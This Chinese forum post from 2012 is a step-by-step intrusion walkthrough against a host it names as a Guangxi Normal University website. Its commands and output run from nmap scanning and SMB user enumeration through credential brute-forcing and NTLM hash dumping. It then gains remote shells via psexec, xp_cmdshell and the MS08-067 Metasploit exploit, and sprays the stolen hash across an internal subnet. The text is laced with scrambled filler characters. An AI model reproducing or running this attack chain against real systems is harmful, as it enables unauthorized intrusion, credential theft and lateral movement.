广西师范网站http://202.103.242.241/! ], n" p* z, x" r( X
0 A2 P3 }* }, f0 Y* H& Y0 {- o
root@bt:~# nmap -sS -sV 202.103.242.241
1 C& {8 w" ]) X% A3 M, c
) m1 `" W; l! T, D w& Q4 }Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
" j! U& _) B$ i/ }' a7 h* X) V7 \3 T/ \" W) h2 `* K8 ?
Nmap scan report for bogon (202.103.242.241)" x; |5 l0 c8 n7 x1 R6 c
4 b& m, o" G$ O5 d
Host is up (0.00048s latency).0 Z2 A( C$ t8 C M7 l0 s
% T7 Y* b) j3 T; H
Not shown: 993 closed ports
% B P* z( w2 t. d H9 z& P& X! A& X' F* ^$ z% {
PORT STATE SERVICE VERSION
" j2 p8 P& R# Q4 |- V. s# _5 H/ U5 p7 r* i; b& \6 w6 z* z
135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
. p% }( J/ T4 ?, o4 C8 e. K4 z9 D' q, a* z) W
139/tcp open netbios-ssn7 Q1 @' r4 C% L" X2 x2 O& g% W
: a3 u! H( d m3 O- \. A
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
) w9 y" r# V( Q' N+ X0 E# @+ N
4 Y" n, @' G& j2 ] M2 c8 E1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
+ J, }4 A5 G; D" C4 I, Y- z2 {1 v" F k
1026/tcp open msrpc Microsoft Windows RPC
! Y6 i2 n' E* p) I8 R, e+ H. x
4 i/ N! f% r" ? X5 ?3372/tcp open msdtc?
1 ~; }1 R& Z0 n$ ]- J( m2 h
1 ?' F v& w7 R% b# r) q3389/tcp open ms-term-serv?
8 T: r# V3 l g8 t+ n# ?: z4 b8 w9 j
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
- ~8 H% `5 c/ }4 n8 S+ uSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
4 a: s0 n- z$ P7 v/ A
( r) Z7 E/ s- m# ASF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions4 L: Q7 t/ I/ |% B, h8 C% d0 [
' k, p3 L$ s- ?% MSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
& N3 z7 }0 x0 o7 ?
: _; K9 ^1 H, c* |" T* N* P: ?" qSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
/ }# U' Q: u; c) H/ y9 D% p3 m3 u. B$ O1 m
SF:ptions,6,”hO\n\x000Z”);2 m! _9 z, x. Q% [. b5 A
( n; |% q2 _' T- l" JMAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems)
6 ~8 T' m8 U# o' ~
. f: n6 J6 W* ?) C. \Service Info: OS: Windows
9 b* p) o) Z# o- n/ C8 I" f7 T& @ S) _+ n
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .! T2 c- J4 a1 \" W/ h
6 Q! e$ _4 x9 N5 x) ^) z' Y
Nmap done: 1 IP address (1 host up) scanned in 79.12 seconds) `+ Q2 S8 Y& [
& u2 ^% ]( @1 t* @* f/ _- d9 o% R/ l* ]$ nroot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本, y4 e) z0 _* t7 l) v9 e+ a
5 n/ p5 I+ D/ Y4 f* E/ g
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse% w+ c8 Z/ a* O
! \3 B1 A+ _2 p
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
. a# Z3 D$ H( p) I2 q( X& ^& ~& z% I5 P
-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse8 k5 V/ p" G/ \: l# J2 f
0 ^3 H0 O0 q& g6 H# Z# p-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
( {% b: M& i7 O1 T- _' q2 x9 a) r* i, {* @7 {
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse
- Q9 V' Q! q9 T6 @& h3 b# c8 M. `( c! C ]
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse2 K+ t& {4 ] X! ?. T
, F3 E& D. a/ r' L5 f: w) ]-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse
" F0 x+ q: V! d* N# f; T' K' `; u2 C) U+ ?9 ?; P8 n5 ?' X
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
, {* E5 y) a- A3 u/ h
4 z9 x- s0 W3 f3 h3 r) N I4 j-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse
0 S/ a+ Z; r. A* ~; B0 X, l2 _4 y4 D# C
-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse' v0 R9 D7 g7 P u u5 N
I0 T0 k9 ]) F& \5 I% H" [
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse$ W2 B0 h8 a5 x* v3 p
1 l; S, x0 Y! L0 z9 m2 O" ?% ?( q4 I-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse. p c) K+ h2 m
+ {- S4 e1 t m7 S
-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse3 K+ k9 @/ @8 | r$ _3 V. W
6 x( y; d% k6 D9 o( V: j-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse% }# z; q* D, m
4 D3 C) R9 R; A$ R1 v) W-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse+ x& U$ b; y# ^ l! ?5 E
2 N# f' k/ q6 s" J! Mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
/ n/ B' i' r/ o/ E( } i8 ?" ~1 o" m
//此乃使用脚本扫描远程机器所存在的账户名
3 _* o+ I+ u+ @1 l. d7 x3 t" v( _7 ^8 e# Q* U- p; V
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
% i1 B" D( s* b+ e- \# K$ y* q' s* W9 d* A
Nmap scan report for bogon (202.103.242.241)
! |: r' K0 U; G& @/ h* n6 a" B5 |: j3 }' l+ n( _) u
Host is up (0.00038s latency).
$ ?$ L$ z" s+ z3 w \. E& u7 U4 A* P0 }8 p: T+ v
Not shown: 993 closed ports8 J9 I0 Q/ q. L, p/ o
+ n6 r) T" K' J- x0 wPORT STATE SERVICE
2 y3 b) p- P4 J" s f* k" |3 w- N1 D$ p4 R
135/tcp open msrpc4 T) q3 M3 c3 ]4 S8 U4 g; k5 N
. y0 T, @% ]+ s4 F/ v- i" z( g139/tcp open netbios-ssn
; f6 ?: b5 D9 I& h( b3 Y! u) U
! d: P& s7 n3 T445/tcp open microsoft-ds2 ~( i8 O: y `* U' v4 h! b x
6 ?1 X7 v( b2 N
1025/tcp open NFS-or-IIS8 K% w B) ^7 ]# w& t" |
% [! V# `% z1 `; G
1026/tcp open LSA-or-nterm# l& l- V( E8 V' C* o
. d5 Q, U' O2 s) G3372/tcp open msdtc* n6 \1 p( U' j
7 z8 I; T; W5 q2 A3389/tcp open ms-term-serv) l8 v v- T& i% ~% W* R) k/ `
- b* N' i) ^! w, Q- DMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
7 L$ \4 \ m' X& f5 g
7 e1 m, Q/ X/ i$ y) Y. ]' I. nHost script results:* h) L; U0 b, u" o3 X x! z9 x
) Y5 ^$ d& K5 c1 n0 G8 x| smb-enum-users:& X3 ]2 w+ o1 x% e0 j w, p! |
1 @9 a1 u ]6 a9 ^* {0 q|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
- n) N0 z( w$ e o% C, w2 f
: f" Z4 e" T! L' Q- f, e3 ?Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds* X$ S5 j6 Q) q5 }) r; o0 ]
, M+ W7 r* H$ R# R, Sroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241
# \0 p: D# X) M$ `5 g, r6 A% n6 e7 P8 t
//查看共享 V) y. U* }( ~" l- w! Z
' f) D o* j, W2 i! dStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
$ e$ v8 _3 Y1 M+ J" j& o1 [/ O1 l& v: o2 D+ ~+ j. P
Nmap scan report for bogon (202.103.242.241)% ]) |$ U8 G6 J* R' B& u) R
' z N$ J o1 i1 T7 U h
Host is up (0.00035s latency).
8 H1 R G' \0 O" Y' D$ m' C0 S, l1 G
Not shown: 993 closed ports
6 C' [ f/ D$ }4 R& s4 ]+ H
+ r p4 w, `# c& ZPORT STATE SERVICE
+ y( f' J( Y5 W3 N4 C' y+ X7 s6 M- K+ j
135/tcp open msrpc
. g4 r% X. L5 ? i7 h' b0 T
( k8 s+ R9 `7 z N; W) V139/tcp open netbios-ssn( z8 u ~( ~# J6 S, f
7 j$ c+ P" C' I2 Y, i2 `445/tcp open microsoft-ds9 T {0 h6 }, ^& @
" ]- K8 E2 n2 E& y4 v* |- b1025/tcp open NFS-or-IIS) r1 f" |$ {- u3 h- B0 c0 \
: ~0 l) j" A; v/ U" r/ Z9 ]+ ^
1026/tcp open LSA-or-nterm9 v8 h+ ~1 |& C2 S1 {
# M% o t8 O2 Z Y8 E# s! o3372/tcp open msdtc1 Z/ Z4 T: w* c+ ?- k' c S4 ]1 w
1 K( _# S& P1 u3389/tcp open ms-term-serv
' g. N9 z# l( [* L' M$ C
n# ] i: b# `: u/ o. ` `2 jMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)' j( _0 m! X% M3 G7 p7 n9 i
: G! p, u7 q5 x' s- pHost script results:
: e: `+ {$ H' Z$ O4 ]* q) o/ z0 E6 E7 K/ s' _, k: x# M- e
| smb-enum-shares:4 M8 {& O; ?. m! }* E
, w; n- D' ], x6 g5 g9 _. ?
| ADMIN$
2 V* F% V; V" T' v; E' @* @
X* e4 Y( U& [+ R# A+ ^. H M$ T| Anonymous access: <none> H( a6 o: [$ Y1 R1 X9 W
1 D$ Q# \* W5 p( ~ O* F+ O| C$
8 f+ K* W. g' Y4 h" \+ [4 A$ f
- T' l$ [3 X2 D2 B6 a| Anonymous access: <none>
) `: ~9 d$ p- ^3 d9 r# R3 _
6 n" O) d* i" V2 Y9 u| IPC$/ f3 h6 \: I2 Q+ q' |$ a; P; b4 e& f- e
3 m) m9 G/ G; G7 u
|_ Anonymous access: READ8 b8 t" C6 f: `' F; k/ D, R; t
. ^: n3 `4 ]3 v) HNmap done: 1 IP address (1 host up) scanned in 1.05 seconds
' u' H& J/ ]( [- }$ f
2 |- U4 G- j6 K L! h. H% droot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 8 i6 Q: D# `: Z3 O# k, p/ g; H
' _0 s: [2 E; a! ?
//获取用户密码( P1 q" t& M. t% T& z
; Z' f ]% W1 B W/ uStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
6 o4 D$ Q. t* B$ e# u; ^" a* t
Nmap scan report for bogon (202.103.242.2418)
+ O4 x5 c) H) Q( }) k: I/ V6 S" N8 t5 [* h
Host is up (0.00041s latency).1 P* u% Y( ]2 t0 l+ C
+ C, U! ~/ ?+ c( m
Not shown: 993 closed ports
" d. i5 _! `! S* V7 k0 q# n! o. C' F; @
3 J" S1 j$ X( c' t4 z6 ^, fPORT STATE SERVICE
c% T& r, o+ k& m: ~% ~0 h0 Q4 f1 a6 K3 n/ a$ J" Q
135/tcp open msrpc# X+ Y' E, V0 B# w( [# t
1 o, E7 [; M6 Z' ^# n139/tcp open netbios-ssn
" ` y+ m! Y+ [+ b4 f2 U% Z. ~, _7 D
/ z5 N9 b& ?+ [4 a9 U6 t+ q ^) o445/tcp open microsoft-ds
k% N% a2 k1 J+ h
9 G7 K5 W3 H6 [- b b1025/tcp open NFS-or-IIS
! x, M2 y0 b! X- U; R- E- Z9 w, U+ O) H w% b2 r( \/ V8 d" U
1026/tcp open LSA-or-nterm
" ?; \, q* Q! }( W+ f& c* |9 P: \
7 y% M% K6 h# C$ V8 d* A3372/tcp open msdtc
3 t2 B5 E" X8 f! D( {' O" s! x
" ^# g1 u* O8 w$ ~% O3389/tcp open ms-term-serv7 ], e& ?( N: x0 B
2 Q# {" c& A; g2 yMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)9 o! h. U, p Y& ?) [
' }; C& I) t2 W+ }0 S i* o
Host script results:
! b7 x0 y! t0 L3 z- Z
8 o+ w! o+ V) h* _| smb-brute:
% m2 b) B% M. [+ s$ j& V( k
/ \* ?. `3 ]- @3 X/ w# h( ^! A tadministrator:<blank> => Login was successful
p6 g% i; I8 U9 O3 Q$ a6 u9 \* M; M. }3 p
|_ test:123456 => Login was successful
" W0 w- U) D. Q+ {1 a& \/ i! U" p) a
/ V- v/ P6 w' K4 A, f' }Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
+ P9 K/ X+ G& e% Z. A; `
$ J8 T2 {, S* S, Lroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash) I8 s; N! z; Q' @8 _
' s- f7 Z+ s" ~, _4 a4 a! n. R
root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data
6 X3 g1 R% @; X, N
3 i+ `6 \+ N7 W6 R5 Xroot@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
1 g2 i- e1 O/ ?6 F2 f6 L+ X& O h$ W0 k$ N
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139
' c& o8 J# @5 K# D+ s% h+ R9 b- t$ r, t4 T- t
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
; h3 T9 ~' w5 v- x
8 L# [& Z8 ]( g3 \5 ], qNmap scan report for bogon (202.103.242.241)& M' r% A z! B1 |/ o- J* `& B. c
! H7 n6 j% o! q2 V9 F1 S6 s
Host is up (0.0012s latency). q8 C$ r) \8 G
0 Z3 ?5 f8 I; h5 {( [
PORT STATE SERVICE& |0 {1 f6 i; y# k$ H
, u# v' j! T; A7 z8 ^135/tcp open msrpc
# p+ Q8 T; M9 S5 f" @& X4 `, F# K) h( m. F/ D
139/tcp open netbios-ssn
( \5 R4 G0 P+ g e, W& Y+ s# z7 C# i: n1 H1 i. k
445/tcp open microsoft-ds
; K' s: u' q0 R! m) b0 \- u
! J, w5 w+ q4 N' f8 Q# @4 JMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& Y. Q8 } k% T) O# c/ \
( O2 M% h% X v( [' o* MHost script results:( w( e* @7 q% h' n0 \5 j* v- i
. P9 m! n) }. y; `, j d
| smb-pwdump:
; c( b/ M2 }4 L+ Z
6 O) e) H( o- f- T| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************; p1 I" a9 L0 E5 H% C( w
0 y" D; n5 B9 }8 O$ F) }6 W; ^
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
8 D# K7 f4 f0 t* F0 T+ p
+ K; o& P, U! L- h0 ?| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
0 [2 V) `. I8 x$ ] Q: @/ }
1 b$ r: s5 O z- Y* A|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D26 {4 ]7 u1 ~9 H
& \! T. r- i2 \' X8 e9 \ \, fNmap done: 1 IP address (1 host up) scanned in 1.85 seconds# S4 g M4 k# B: x
$ U/ w7 I+ P5 G0 l1 r. w1 W$ }C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell- y! _ V6 w" E. M2 a# v
% ]1 P1 i' D. }5 ~
-p 123456 -e cmd.exe# {9 Y9 [9 K7 z5 ~
) M F; V; o6 {5 E4 KPsExec v1.55 – Execute processes remotely2 B" t4 v: \8 Z0 W4 N5 T! l& a
$ l" L* H! O& N0 F% ] X+ y
Copyright (C) 2001-2004 Mark Russinovich* ^* E/ s$ [# A
) ~) | I8 x$ t# K& l9 C2 OSysinternals – www.sysinternals.com
1 T u4 Y8 {8 D. Y5 l8 ^* y) j- U; b1 o3 E: a& Y0 R
Microsoft Windows 2000 [Version 5.00.2195]
, n/ G, \' u7 i, S! k! {' K3 L. W
2 H* S; n! L, z; z# {. p(C) 版权所有 1985-2000 Microsoft Corp.
3 H1 w, C. S: z. d) n1 H1 U* U3 I% s: Q# p' G
C:\WINNT\system32>ipconfig
; e0 D0 b0 |6 r* Y' E
/ [3 c- S# c2 F P- v1 fWindows 2000 IP Configuration
9 Z( ]8 t: [3 z( o) k- T! |5 N) D& p9 ^' x3 N7 z
Ethernet adapter 本地连接:# s3 A9 h) S9 ?& N
) K+ [; ]3 N& J7 EConnection-specific DNS Suffix . :
" X( X+ L2 F+ r" k) W) c8 ]: Y* W- a v( ~* Z% H7 C6 c/ n/ [9 a; c
IP Address. . . . . . . . . . . . : 202.103.242.2414 m2 N' \$ Y: G, e! \' z
! i9 `, y# m9 \# nSubnet Mask . . . . . . . . . . . : 255.255.255.0
4 Z1 s3 A; q) L2 k1 o/ H& q$ K" a$ m
Default Gateway . . . . . . . . . : 202.103.1.12 w( q1 ]/ R0 U4 J1 U$ F1 l6 p1 t
; G! J; ^) p- N6 sC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
( R( C8 [" O4 @9 C. |% D
( d: v) S: l# U$ Wroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞" E$ Q7 `. L/ x" ]" p+ P! ~
3 `* q5 w& r! S3 v( ]* W6 UStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
% L+ K) ~* k' `7 n" n! T/ v/ e0 h- k2 u: b1 _& o) |2 n. p
Nmap scan report for bogon (202.103.242.241)! S7 W* u9 t- l W! a0 ? X J
' Y) `/ {3 [/ D+ P3 p
Host is up (0.00046s latency).
- j7 X: d- _" C8 m9 C' Y
/ u4 M: D j7 P! }8 A7 [ s) j. ONot shown: 993 closed ports
3 z) t. e- { b! z& y6 @
3 e& f- V0 _; u k3 p* F6 ?; T0 DPORT STATE SERVICE
7 M+ L4 n( J$ ], h! R# }$ H" C" A2 p" E
135/tcp open msrpc% ^4 q3 o& E, E$ n& k
6 l$ k+ y) ]$ S0 F% L/ A- ^139/tcp open netbios-ssn! Z) J R1 _$ K1 n5 H/ W
8 |* V2 m8 _/ h: }& V2 T5 w
445/tcp open microsoft-ds
C- w' T" G+ d6 A
5 r% p$ a v8 J- o0 U1025/tcp open NFS-or-IIS
2 X9 |$ V% E% M5 H6 e6 f; b1 Z; q% C
1026/tcp open LSA-or-nterm( C0 C1 N6 j* R! L# h3 U4 [
( r, S8 s; j }2 a8 z3372/tcp open msdtc) o3 V9 U+ S& @ L/ [
' V. {, q9 E; T# F2 b5 g
3389/tcp open ms-term-serv
0 F/ L1 D( x! }1 O4 u2 N
1 L2 ]7 Z0 h% [5 AMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)5 w2 X7 g3 Z9 n/ L6 C
* X9 Z* F6 h# t, P9 C9 t5 ~Host script results:
" l0 D/ B" l L
" a9 _! c% ^9 Z {! n| smb-check-vulns:
$ Z( Q: @/ O/ x& Y! s( c4 Z/ }: O* A- u7 C1 s
|_ MS08-067: VULNERABLE
' S; L- e. h5 c
! }5 j7 r8 x" ]$ INmap done: 1 IP address (1 host up) scanned in 1.43 seconds
8 D: N1 b V- Z7 ]9 v
: y3 Z' d/ ]! _& S- A5 hroot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出! n! ]6 O8 O. V* a$ f+ b J2 B
3 x. ~/ I6 E. h6 B3 L' B
msf > search ms08" @: n, e; ~7 R0 M; q& z* i+ l
* s W( }# N& b+ q0 }" ]0 rmsf > use exploit/windows/smb/ms08_067_netapi6 u- @+ y- W0 B; S- k% ?+ q; S4 N% `+ ~
5 c9 h4 U; |2 ]- F+ M' o P' Bmsf exploit(ms08_067_netapi) > show options
$ S" o" {# E* m; B
! @4 \- K' d2 A4 dmsf exploit(ms08_067_netapi) > set RHOST 202.103.242.2418 J. M- S3 Y( H% }! r8 z
% @( M' s" q: Q1 w( C$ B
msf exploit(ms08_067_netapi) > show payloads$ v! h; u* f( F4 w
9 F& J0 a; y7 `( @9 Y3 s+ a8 y
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp; |' {; g; J- t! e. T( M& u) X
( F+ l8 E5 L' t7 D9 o0 B8 Lmsf exploit(ms08_067_netapi) > exploit
1 b @- w; u* m) \- {
% Y5 e' {6 i X U. z' i5 Hmeterpreter >
7 v7 J; D' K$ I. x r6 s! ]( e
6 J8 ]2 H5 _9 b9 cBackground session 2? [y/N] (ctrl+z)
: V0 V# D1 B& W
) j' j- v3 Y5 h* ?; U6 S5 lmsf exploit(ms08_067_netapi) > sessions -l
1 H1 {- a# W l, l5 k2 t" }# Q# L8 y5 V9 I. k
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt- S: C! U9 H, H) }1 y
2 L% D8 f }+ Y
test, k6 s g6 J' G: O
, p- ^& T$ v( B2 w x3 O
administrator
; R$ e( k* X: Y8 l! i- @9 h5 C% D# N3 h m
root@bt:/usr/local/share/nmap/scripts# vim password.txt: ^8 m7 B$ R5 r' y/ `1 ]
1 I0 W; p( |8 Q3 \44EFCE164AB921CAAAD3B435B51404EE& w' J+ N( Z& C/ _7 s8 N* H
5 n7 Q! L: T) s. {
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254 * P& D; ]% C" L9 J$ e6 C9 Z
: O! a2 S% E' ` //利用用户名跟获取的hash尝试对整段内网进行登录
' y0 I4 }" M- R) Y0 x+ @( w' W8 F8 N, c" ~0 \2 x1 h& n
Nmap scan report for 192.168.1.1056 q7 _! |4 U8 b+ \) q' }
+ O7 N7 w: x. w c2 ]( }
Host is up (0.00088s latency).9 |5 D0 j/ w2 G$ u1 N% F
$ k7 v! @4 Q0 WNot shown: 993 closed ports1 t9 ?/ \9 K# K. `, [
* |3 N: d E9 w0 N' Y6 O4 I, vPORT STATE SERVICE
5 _, C) f" _) Z4 b; @' E5 p) B+ l, Z# j) v) N/ B7 d- P o: D; h: [) r- Y
135/tcp open msrpc
; [; J1 g) v' n8 ^& M9 k' D! H9 M/ i: W: }2 J( z; b7 d
139/tcp open netbios-ssn
: ]! [. y9 [" q9 J, W K( ?$ E
8 t, B& I' y, U. w445/tcp open microsoft-ds
9 a0 W$ Q7 F% n5 z8 F# w* f# Q: k
1025/tcp open NFS-or-IIS
/ s+ i' K9 _: J- b/ I
( L/ L+ @1 T9 q9 h) I1026/tcp open LSA-or-nterm
; D' Z( N0 e3 i4 Y t8 j
7 g( G0 u; q, q0 ^( Y9 S" e8 H3372/tcp open msdtc
- F1 H! l4 Y: [( U; e* `5 A( x8 d( x" C1 ]: K( A. F
3389/tcp open ms-term-serv
0 K3 Q5 N) u& \% ~3 ~) F6 H" _9 b7 C6 l' i
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems) I3 C1 j3 c2 N- w; {3 }+ k
% x# @# m. `/ m9 x3 r/ `
Host script results:7 f) h+ C4 B$ _# T4 z
1 Y- u- G/ W9 J9 D9 S4 K( }/ k0 P
| smb-brute:- X. p8 z$ l2 B- d, }- j, N
) m( k. {$ H5 M1 E
|_ administrator:<blank> => Login was successful
1 x3 \: {9 r% a7 \. G1 Y' m- p# D" S. }. C( C) l& J
攻击成功,一个简单的msf+nmap攻击~~·& b. |0 c4 v& r% H
( P3 G6 W7 g) E# |; W4 S- Z$ v
|
发表于 2012-12-4 12:46:42
收藏
支持
反对